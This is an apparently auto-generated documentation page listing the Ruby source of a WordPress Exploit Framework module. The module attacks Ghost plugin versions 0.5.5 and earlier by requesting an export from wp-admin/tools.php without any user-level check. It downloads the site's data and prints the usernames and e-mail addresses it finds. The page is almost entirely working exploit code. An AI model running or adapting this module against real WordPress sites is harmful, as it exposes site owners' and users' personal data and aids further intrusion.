class Wpxf::Auxiliary::GhostUnrestrictedExportDownload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/ghost_unrestricted_export_download.rb, line 6 def initialize super update_info( name: 'Ghost Plugin <= 0.5.5 - Unrestricted Export Download', desc: %( This module utilises a lack of user level validation in versions <= 0.5.5 of the Ghost plugin to download an export of the WordPress data, including usernames and e-mail addresses. ), author: [ 'Josh Brody', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8479'] ], date: 'May 02 2016' ) register_option( IntegerOption.new( name: 'http_client_timeout', desc: 'Max wait time in seconds for HTTP responses', default: 300, required: true ) ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/ghost_unrestricted_export_download.rb, line 41 def check check_plugin_version_from_readme('ghost', '0.5.6') end
download_request_params()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/ghost_unrestricted_export_download.rb, line 49 def download_request_params { 'ghostexport' => 'true', 'submit' => 'Download Ghost file' } end
downloader_url()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/ghost_unrestricted_export_download.rb, line 45 def downloader_url normalize_uri(wordpress_url_admin, 'tools.php') end
file_category()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/ghost_unrestricted_export_download.rb, line 60 def file_category 'database export' end
file_extension()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/ghost_unrestricted_export_download.rb, line 56 def file_extension '.json' end
print_detected_users(data)
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/ghost_unrestricted_export_download.rb, line 69 def print_detected_users(data) json = JSON.parse(data) users = json['data']['users'] if users users_table = [{ name: 'Username', email: 'E-mail' }] users.each do |user| users_table.push(name: user['name'], email: user['email']) end emit_success "Found #{users.length} users" emit_table users_table end rescue StandardError emit_error 'Failed to parse the download. The plugin may be disabled or the export may be corrupt.' end
register_remote_file_option?()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/ghost_unrestricted_export_download.rb, line 37 def register_remote_file_option? false end
validate_content(content)
click to toggle source
Calls superclass method
Wpxf::WordPress::FileDownload#validate_content
# File lib/wpxf/modules/auxiliary/file_download/ghost_unrestricted_export_download.rb, line 64 def validate_content(content) print_detected_users content super end